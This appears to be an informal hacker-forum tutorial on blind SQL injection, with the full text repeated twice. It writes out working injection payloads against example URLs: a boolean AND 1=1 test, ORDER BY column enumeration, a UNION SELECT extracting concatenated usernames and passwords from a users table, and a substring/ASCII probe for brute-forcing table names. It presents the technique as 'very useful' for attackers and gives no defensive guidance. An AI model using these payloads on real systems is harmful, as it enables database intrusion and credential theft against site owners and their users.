What is Blind SQL Injection?
Blind SQL Injection works in a similar way to SQL Injection except the page is not displaying an error message.
How do I find an Blind SQL vulnerability?
To find a page which is vulnerable to SQL you need to add to a premade SQL Query. For instance
This query is asking;
SELECT (require data) FROM (required form) WHERE id = 2.
We can exploit this by adding and extra query on the end. eg
http://www.example.com/blind/sql/vulnerable.php?id=2 AND 1=1
This should not change the output but still show the AND 1=1 in the url.
How does this help me?
You now have a page which can answer true or false to any query you ask it. By using subqueries and such you can discover data off a database. This takes time and effort and therefore is ineffiecent. A better way to solve this problem is a simple brute force type program which can develop a picture of the database.
Finding Column Number
By using the "ORDER BY" Clause, you can find out how many columns are being queried ie
http://www.example.com/blind/sql/vulnerable.php?id=2 ORDER BY 5
If there are more than 5 columns then you will be able to still see your results, otherwise you will receive and error or a bland page
Grabbing Different Table's Data
You can also use UNION statements to grab data from other tables ie
http://www.example.com/blind/sql/vul...e.php?id=99999 UNION ALL SELECT null,null,concat(username,password),null,null FROM users
How do I do this?
Well, simply you connect to the vulnerable file and attempt things such as substrings for example;
http://www.example.com/blind/sql/vulnerable.php?id=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109
This asks for the first user table in the database and the 1st character in it's name. If it fits the critera that the name begins with a letter after m iin the alphabet then it will display the article. Now a bruteforce type program can show the whole name by continueing the sequence until it has all the data.
This is not a very well known exploit and very difficult to prevent and spot. Watch out for it as it can be very useful!!
Thanx for reading guys
Blind SQL Injection works in a similar way to SQL Injection except the page is not displaying an error message.
How do I find an Blind SQL vulnerability?
To find a page which is vulnerable to SQL you need to add to a premade SQL Query. For instance
This query is asking;
SELECT (require data) FROM (required form) WHERE id = 2.
We can exploit this by adding and extra query on the end. eg
http://www.example.com/blind/sql/vulnerable.php?id=2 AND 1=1
This should not change the output but still show the AND 1=1 in the url.
How does this help me?
You now have a page which can answer true or false to any query you ask it. By using subqueries and such you can discover data off a database. This takes time and effort and therefore is ineffiecent. A better way to solve this problem is a simple brute force type program which can develop a picture of the database.
Finding Column Number
By using the "ORDER BY" Clause, you can find out how many columns are being queried ie
http://www.example.com/blind/sql/vulnerable.php?id=2 ORDER BY 5
If there are more than 5 columns then you will be able to still see your results, otherwise you will receive and error or a bland page
Grabbing Different Table's Data
You can also use UNION statements to grab data from other tables ie
http://www.example.com/blind/sql/vul...e.php?id=99999 UNION ALL SELECT null,null,concat(username,password),null,null FROM users
How do I do this?
Well, simply you connect to the vulnerable file and attempt things such as substrings for example;
http://www.example.com/blind/sql/vulnerable.php?id=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109
This asks for the first user table in the database and the 1st character in it's name. If it fits the critera that the name begins with a letter after m iin the alphabet then it will display the article. Now a bruteforce type program can show the whole name by continueing the sequence until it has all the data.
This is not a very well known exploit and very difficult to prevent and spot. Watch out for it as it can be very useful!!
Thanx for reading guys
